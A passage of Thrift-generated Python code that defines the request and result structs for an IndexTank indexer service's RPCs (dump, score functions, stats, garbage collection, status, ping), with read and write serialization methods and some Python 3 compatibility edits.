  Thrift result struct for the dump call.

  No 'success' field is declared; only a server-side exception may come back.

  Attributes:
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('dump_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class addScoreFunction_args:
  """
  Thrift argument struct for the addScoreFunction call.

  Attributes:
   - functionIndex: slot at which to register the function (i32, field id 1)
   - definition: textual definition of the scoring function (string, field id 2)
  """
  thrift_spec = (
    None, # 0
    (1, TType.I32, 'functionIndex', None, None, ), # 1
    (2, TType.STRING, 'definition', None, None, ), # 2
  )
  def __init__(self, functionIndex=None, definition=None,):
    self.functionIndex = functionIndex
    self.definition = definition
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.functionIndex = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.definition = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('addScoreFunction_args')
    if self.functionIndex != None:
      oprot.writeFieldBegin('functionIndex', TType.I32, 1)
      oprot.writeI32(self.functionIndex)
      oprot.writeFieldEnd()
    if self.definition != None:
      oprot.writeFieldBegin('definition', TType.STRING, 2)
      oprot.writeString(self.definition)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class addScoreFunction_result:
  """
  Thrift result struct for the addScoreFunction call.

  No 'success' field is declared; only a server-side exception may come back.

  Attributes:
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('addScoreFunction_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class removeScoreFunction_args:
  """
  Thrift argument struct for the removeScoreFunction call.

  Attributes:
   - functionIndex: slot of the scoring function to remove (i32, field id 1)
  """
  thrift_spec = (
    None, # 0
    (1, TType.I32, 'functionIndex', None, None, ), # 1
  )
  def __init__(self, functionIndex=None,):
    self.functionIndex = functionIndex
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.functionIndex = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('removeScoreFunction_args')
    if self.functionIndex != None:
      oprot.writeFieldBegin('functionIndex', TType.I32, 1)
      oprot.writeI32(self.functionIndex)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class removeScoreFunction_result:
  """
  Thrift result struct for the removeScoreFunction call.

  No 'success' field is declared; only a server-side exception may come back.

  Attributes:
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('removeScoreFunction_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class listScoreFunctions_args:
  """Thrift argument struct for the listScoreFunctions call. Declares no fields."""
  thrift_spec = (
  )
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        # No fields are declared; skip anything encountered.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('listScoreFunctions_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class listScoreFunctions_result:
  """
  Thrift result struct for the listScoreFunctions call.

  Attributes:
   - success: map of function index (i32) -> definition (string), field id 0
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    (0, TType.MAP, 'success', (TType.I32,None,TType.STRING,None), None, ), # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, ite=None,):
    self.success = success
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.MAP:
          # Decode the i32 -> string success map element by element.
          self.success = {}
          (_ktype234, _vtype235, _size233 ) = iprot.readMapBegin()
          for _i237 in xrange(_size233):
            _key238 = iprot.readI32();
            _val239 = iprot.readString();
            self.success[_key238] = _val239
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('listScoreFunctions_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.MAP, 0)
      oprot.writeMapBegin(TType.I32, TType.STRING, len(self.success))
      for kiter240,viter241 in self.success.items():
        oprot.writeI32(kiter240)
        oprot.writeString(viter241)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class stats_args:
  """Thrift argument struct for the stats call. Declares no fields."""
  thrift_spec = (
  )
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        # No fields are declared; skip anything encountered.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('stats_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class stats_result:
  """
  Thrift result struct for the stats call.

  Attributes:
   - success: IndexerStats struct returned by the server (field id 0)
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    (0, TType.STRUCT, 'success', (IndexerStats, IndexerStats.thrift_spec), None, ), # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, ite=None,):
    self.success = success
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = IndexerStats()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('stats_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_stats_args:
  """Thrift-generated argument struct for the get_stats() RPC (no fields)."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast C path when the accelerated binary protocol + fastbinary are available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_stats_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_stats_result:
  """Thrift-generated result struct for the get_stats() RPC.

  Attributes:
   - success
   - ite
  """
  thrift_spec = (
    (0, TType.MAP, 'success', (TType.STRING,None,TType.STRING,None), None, ), # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, ite=None,):
    self.success = success
    self.ite = ite
  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.MAP:
          self.success = {}
          (_ktype243, _vtype244, _size242 ) = iprot.readMapBegin()
          # range() replaces the Python-2-only xrange() (works on 2 and 3).
          for _i246 in range(_size242):
            _key247 = iprot.readString();
            _val248 = iprot.readString();
            self.success[_key247] = _val248
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_stats_result')
    # 'is not None' instead of '!= None' (identity check; PEP 8).
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.MAP, 0)
      oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.success))
      for kiter249,viter250 in self.success.items():
        oprot.writeString(kiter249)
        oprot.writeString(viter250)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    if self.ite is not None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class force_gc_args:
  """Thrift-generated argument struct for the force_gc() RPC (no fields)."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast C path when the accelerated binary protocol + fastbinary are available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('force_gc_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class force_gc_result:
  """Thrift-generated result struct for the force_gc() RPC.

  Attributes:
   - ite
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('force_gc_result')
    # 'is not None' instead of '!= None' (identity check; PEP 8).
    if self.ite is not None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class getStatus_args:
  """Thrift-generated argument struct for the getStatus() RPC (no fields)."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast C path when the accelerated binary protocol + fastbinary are available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getStatus_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class getStatus_result:
  """Thrift-generated result struct for the getStatus() RPC.

  Attributes:
   - success
  """
  thrift_spec = (
    (0, TType.I32, 'success', None, None, ), # 0
  )
  def __init__(self, success=None,):
    self.success = success
  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.I32:
          self.success = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getStatus_result')
    # 'is not None' instead of '!= None': a success value of 0 must still be
    # written, and identity comparison is the PEP 8 idiom.
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.I32, 0)
      oprot.writeI32(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class ping_args:
  """Thrift-generated argument struct for the ping() RPC (no fields)."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast C path when the accelerated binary protocol + fastbinary are available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('ping_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class ping_result:
  """Thrift-generated result struct for the void ping() RPC (no fields)."""
  thrift_spec = (
  )
  def read(self, iprot):
